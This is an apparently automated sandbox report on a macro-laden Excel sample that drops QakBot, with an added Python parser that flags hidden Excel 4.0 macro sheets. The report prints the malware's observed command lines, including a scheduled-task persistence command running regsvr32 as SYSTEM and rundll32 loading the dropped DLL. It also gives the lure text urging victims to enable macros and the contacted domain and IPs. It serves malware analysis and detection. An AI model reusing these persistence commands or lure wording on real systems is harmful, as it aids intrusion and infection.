Analysis Report 9659e9a8_by_Libranalysis.xls

Overview

General Information

Sample Name: 9659e9a8_by_Libranalysis.xls
Analysis ID: 412182
MD5: 9659e9a80fba8f055fbe4e3757b0fd88
SHA1: 701af32440a369d3bf1533cf3d741904b614a470
SHA256: 252bda62a929c697a8b96035c1a52314d88067e745799cb66ac5d9dd593379b0
Tags: SilentBuilder
Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office process drops PE file
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6780 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 7104 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • explorer.exe (PID: 6480 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • schtasks.exe (PID: 6500 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46 MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 5668 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • regsvr32.exe (PID: 4816 cmdline: regsvr32.exe -s 'C:\Users\user\ritofm.cvm' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5132 cmdline: -s 'C:\Users\user\ritofm.cvm' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 3912 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • regsvr32.exe (PID: 984 cmdline: regsvr32.exe -s 'C:\Users\user\ritofm.cvm' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 4780 cmdline: -s 'C:\Users\user\ritofm.cvm' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 5828 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, Rule: QakBot, Description: QakBot Payload, Author: kevoreilly
  • 0x12e27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
Source: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Rule: QakBot, Description: QakBot Payload, Author: kevoreilly
  • 0x13a27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...

Unpacked PEs

Source: 5.2.explorer.exe.ec0000.0.raw.unpack, Rule: QakBot, Description: QakBot Payload, Author: kevoreilly
  • 0x13a27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
Source: 1.3.rundll32.exe.49f0000.0.raw.unpack, Rule: QakBot, Description: QakBot Payload, Author: kevoreilly
  • 0x12e27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
Source: 5.2.explorer.exe.ec0000.0.unpack, Rule: QakBot, Description: QakBot Payload, Author: kevoreilly
  • 0x12e27:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
Source: 1.3.rundll32.exe.49f0000.0.unpack, Rule: QakBot, Description: QakBot Payload, Author: kevoreilly
  • 0x12227:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6780, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 7104

Signature Overview

AV Detection:

Machine Learning detection for dropped file
Source: C:\Users\user\ritofm.cvm, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 5_2_00ED0C51 FindFirstFileW, FindNextFileW

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: ue[1].htm.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\rundll32.exe
Source: global traffic, DNS query: name: signifysystem.com
Source: global traffic, TCP traffic: 192.168.2.4:49729 -> 192.185.39.58:443
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown, DNS traffic detected: queries for: signifysystem.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://outlook.office.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://outlook.office365.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://settings.outlook.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://staging.cortana.ai
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://tasks.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://wus2.contentsync.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.4:49734 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: QakBot Payload Author: kevoreilly
Source: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: QakBot Payload Author: kevoreilly
Source: 5.2.explorer.exe.ec0000.0.raw.unpack, type: UNPACKEDPE Matched rule: QakBot Payload Author: kevoreilly
Source: 1.3.rundll32.exe.49f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: QakBot Payload Author: kevoreilly
Source: 5.2.explorer.exe.ec0000.0.unpack, type: UNPACKEDPE Matched rule: QakBot Payload Author: kevoreilly
Source: 1.3.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE Matched rule: QakBot Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing 11 from the yellow bar above RunDLL X 12 13_ Once You have Enable Editing, pIe'
Source: Screenshot number: 8 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 8 Screenshot OCR: Enable Content from the yellow bar above O ' WHY I CANNOT OPEN THIS DOCUMENT ? W You are using
Source: Document image extraction number: 5 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5 Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14 Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulas
Source: 9659e9a8_by_Libranalysis.xls Initial sample: CALL
Source: 9659e9a8_by_Libranalysis.xls Initial sample: CALL
Source: 9659e9a8_by_Libranalysis.xls Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: 9659e9a8_by_Libranalysis.xls Initial sample: Sheet size: 14902
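The two signatures above (CALL/EXEC formulas, a large hidden Excel 4.0 macro sheet) rest on the BOUNDSHEET records of the BIFF8 Workbook stream, which carry each sheet's visibility state and type. The following is an added example, not part of the sandbox report or of any tooling it uses: a stand-alone parser that walks BIFF records and flags macro sheets (dt = 0x01) that are hidden or very hidden. It runs on a Workbook stream constructed inline; for a real .xls the stream would first be pulled out of the OLE2 compound file (for example with olefile), which this example does not do. The record layout follows [MS-XLS] BoundSheet8; the sample sheet names and offsets are made up.

```python
"""Flag hidden Excel 4.0 (XLM) macro sheets by parsing BIFF8 BOUNDSHEET records.

Operates on the raw bytes of the Workbook stream. In a real .xls that stream
lives inside the OLE2 compound file and must be extracted first (e.g. with
olefile); that step is left out so the script runs stand-alone.
"""
import struct

RT_BOF = 0x0809
RT_BOUNDSHEET = 0x0085
RT_EOF = 0x000A

# BoundSheet8.dt values ([MS-XLS]); 0x01 is an Excel 4.0 macro sheet.
SHEET_TYPES = {0x00: "worksheet", 0x01: "xlm_macro", 0x02: "chart", 0x06: "vba_module"}
# BoundSheet8.hsState values (low two bits of the byte).
VISIBILITY = {0: "visible", 1: "hidden", 2: "very_hidden"}


def iter_records(stream: bytes):
    """Yield (record_type, body) for each BIFF record (2-byte type, 2-byte length, body)."""
    off = 0
    while off + 4 <= len(stream):
        rtype, length = struct.unpack_from("<HH", stream, off)
        body = stream[off + 4: off + 4 + length]
        if len(body) != length:
            break  # truncated record: stop rather than misparse the tail
        yield rtype, body
        off += 4 + length


def parse_boundsheet(body: bytes) -> dict:
    """Decode a BoundSheet8 body: substream offset, visibility, sheet type, name."""
    ply_pos, hs_state, dt, cch, flags = struct.unpack_from("<IBBBB", body, 0)
    hs_state &= 0x03                      # only the low two bits carry the state
    name_bytes = body[8:]
    if flags & 0x01:                      # fHighByte set: UTF-16LE, 2 bytes per char
        name = name_bytes[: 2 * cch].decode("utf-16-le", errors="replace")
    else:                                 # compressed: one byte per char
        name = name_bytes[:cch].decode("latin-1", errors="replace")
    return {
        "name": name,
        "offset": ply_pos,
        "visibility": VISIBILITY.get(hs_state, "unknown"),
        "type": SHEET_TYPES.get(dt, f"unknown_0x{dt:02x}"),
    }


def list_sheets(stream: bytes) -> list:
    """Return every sheet declared in the workbook globals substream."""
    sheets = []
    for rtype, body in iter_records(stream):
        if rtype == RT_BOUNDSHEET:
            sheets.append(parse_boundsheet(body))
        elif rtype == RT_EOF:
            break  # end of the globals substream; the sheet substreams follow it
    return sheets


def hidden_macro_sheets(stream: bytes) -> list:
    """Names of Excel 4.0 macro sheets that are hidden or very hidden."""
    return [s["name"] for s in list_sheets(stream)
            if s["type"] == "xlm_macro" and s["visibility"] != "visible"]


def _boundsheet(offset: int, hs_state: int, dt: int, name: str, unicode: bool) -> bytes:
    """Build one BOUNDSHEET record; used only to construct the sample input below."""
    if unicode:
        raw, flags = name.encode("utf-16-le"), 0x01
    else:
        raw, flags = name.encode("latin-1"), 0x00
    body = struct.pack("<IBBBB", offset, hs_state, dt, len(name), flags) + raw
    return struct.pack("<HH", RT_BOUNDSHEET, len(body)) + body


# Constructed BIFF8 globals substream (not from any real sample): BOF for a
# workbook globals substream, one visible worksheet, one very-hidden XLM macro
# sheet whose name uses the Unicode form, then EOF.
SAMPLE_STREAM = (
    struct.pack("<HH", RT_BOF, 16) + b"\x00\x06\x05\x00" + b"\x00" * 12
    + _boundsheet(0x00000800, 0, 0x00, "Sheet1", False)
    + _boundsheet(0x00003F00, 2, 0x01, "\u0421heet2", True)
    + struct.pack("<HH", RT_EOF, 0)
)

if __name__ == "__main__":
    for sheet in list_sheets(SAMPLE_STREAM):
        print(sheet)
    print("hidden XLM sheets:", hidden_macro_sheets(SAMPLE_STREAM))
```

The second sheet is "very hidden" (hsState 2), a state that cannot be undone from the Excel UI, and its name starts with a Cyrillic letter that renders like a Latin "C"; both are worth flagging on their own because the names Excel shows in the sheet tab bar are not a reliable guide to what the file contains.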
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\ritofm.cvm
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\DBG
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0105822A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01057050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0105538D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_010587CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01053000
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01054910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01055223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01057A3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01056743
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01053943
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01058B55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0105565A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01054F63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01057F75
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01053271
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01059571
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01059A7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_010555AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_010535CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01054CCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_010568D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_010598ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01056BEE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01058DF9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ECBCF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED54C8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED88CA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00EDD0AF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00EC704E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED5422
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00EC69ED
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED91C0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED85D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ECC590
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED3AA2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00EC7295
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED2A55
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED7A02
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00EDCE1C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00EDF615
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00EC77E7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED5B9C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00EC6F2A
Source: 9659e9a8_by_Libranalysis.xls OLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652
Source: ritofm.cvm.5.dr Static PE information: No import functions for PE file found
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 5.2.explorer.exe.ec0000.0.raw.unpack, type: UNPACKEDPE Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 1.3.rundll32.exe.49f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 5.2.explorer.exe.ec0000.0.unpack, type: UNPACKEDPE Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 1.3.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: classification engine Classification label: mal100.expl.evad.winXLS@18/18@2/2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED6E91 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,BitBlt,SysAllocString,CoSetProxyBlanket,
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{F2216F8D-EF73-42B8-8E37-A58300A73E42}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_01
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{D936A919-3D95-457D-8424-47B43B8FC3B5}
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \BaseNamedObjects\Local\WERReportingForProcess5132
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \BaseNamedObjects\Local\WERReportingForProcess4780
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{D936A919-3D95-457D-8424-47B43B8FC3B5}
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{71F94E0F-2F67-4E94-BECF-B06A373927A8} - OProcSessId.dat
Source: 9659e9a8_by_Libranalysis.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
